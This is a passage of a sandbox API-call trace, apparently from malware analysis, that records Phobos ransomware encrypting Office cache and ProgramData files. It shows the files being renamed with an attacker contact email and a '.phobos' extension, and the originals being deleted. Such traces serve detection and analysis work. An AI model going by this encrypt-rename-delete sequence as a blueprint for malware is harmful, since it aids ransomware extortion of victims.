lpNewFilePointer=0x0) returned 1 [0139.775] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0139.775] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0139.776] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0139.776] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0139.776] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91975, lpOverlapped=0x0) returned 1 [0140.368] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x91980, dwBufLen=0x91980 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x91980) returned 1 [0140.373] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x91980, lpOverlapped=0x0) returned 1 [0140.383] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0140.383] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0140.383] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0140.383] CryptDestroyKey (hKey=0xa32d68) returned 1 [0140.383] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0140.383] CryptDestroyKey (hKey=0xa327e8) returned 1 [0140.383] CloseHandle (hObject=0x148) returned 1 [0140.383] CloseHandle (hObject=0x138) returned 1 [0140.388] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 1 [0140.393] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0140.393] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0140.393] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2624) returned 1 [0140.393] CloseHandle (hObject=0x138) returned 1 [0140.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0140.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0140.393] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0140.393] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0140.393] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0140.393] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0140.394] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0140.394] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0140.394] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa40, lpOverlapped=0x0) returned 1 [0143.720] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa50, dwBufLen=0xa50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa50) returned 1 [0143.720] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa50, lpOverlapped=0x0) returned 1 [0143.721] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0143.721] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0143.721] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0143.721] CryptDestroyKey (hKey=0xa32da8) returned 1 [0143.721] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0143.721] CryptDestroyKey (hKey=0xa327e8) returned 1 [0143.721] CloseHandle (hObject=0x138) returned 1 [0143.721] CloseHandle (hObject=0x148) returned 1 [0143.722] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0143.723] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.723] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0143.723] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4274) returned 1 [0143.723] CloseHandle (hObject=0x148) returned 1 [0143.724] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0143.724] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.724] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0143.724] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0143.724] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0143.724] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.724] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0143.724] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0143.724] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10b2, lpOverlapped=0x0) returned 1 [0143.829] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10c0, dwBufLen=0x10c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10c0) returned 1 [0143.829] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10c0, lpOverlapped=0x0) returned 1 [0143.830] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0143.830] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0143.830] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0143.830] CryptDestroyKey (hKey=0xa32d28) returned 1 [0143.830] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0143.830] CryptDestroyKey (hKey=0xa327e8) returned 1 [0143.830] CloseHandle (hObject=0x148) returned 1 [0143.830] CloseHandle (hObject=0x138) returned 1 [0143.831] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0143.832] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.833] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=129745) returned 1 [0143.833] CloseHandle (hObject=0x138) returned 1 [0143.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png")) returned 0x20 [0143.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.833] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.833] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.833] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.834] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2913) returned 1 [0143.834] CloseHandle (hObject=0x138) returned 1 [0143.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml")) returned 0x20 [0143.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.834] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.834] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.834] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.835] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=44488) returned 1 [0143.835] CloseHandle (hObject=0x138) returned 1 [0143.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png")) returned 0x20 [0143.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.835] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.835] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.835] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.835] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=28865) returned 1 [0143.835] CloseHandle (hObject=0x138) returned 1 [0143.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png")) returned 0x20 [0143.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.835] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.836] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.836] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.836] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=39379) returned 1 [0143.836] CloseHandle (hObject=0x138) returned 1 [0143.836] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png")) returned 0x20 [0143.836] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.836] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.836] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.836] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.837] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=129745) returned 1 [0143.837] CloseHandle (hObject=0x138) returned 1 [0143.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png")) returned 0x20 [0143.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.837] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.837] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.837] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0143.837] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1897) returned 1 [0143.837] CloseHandle (hObject=0x138) returned 1 [0143.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml")) returned 0x20 [0143.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0143.838] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0143.838] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0143.838] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 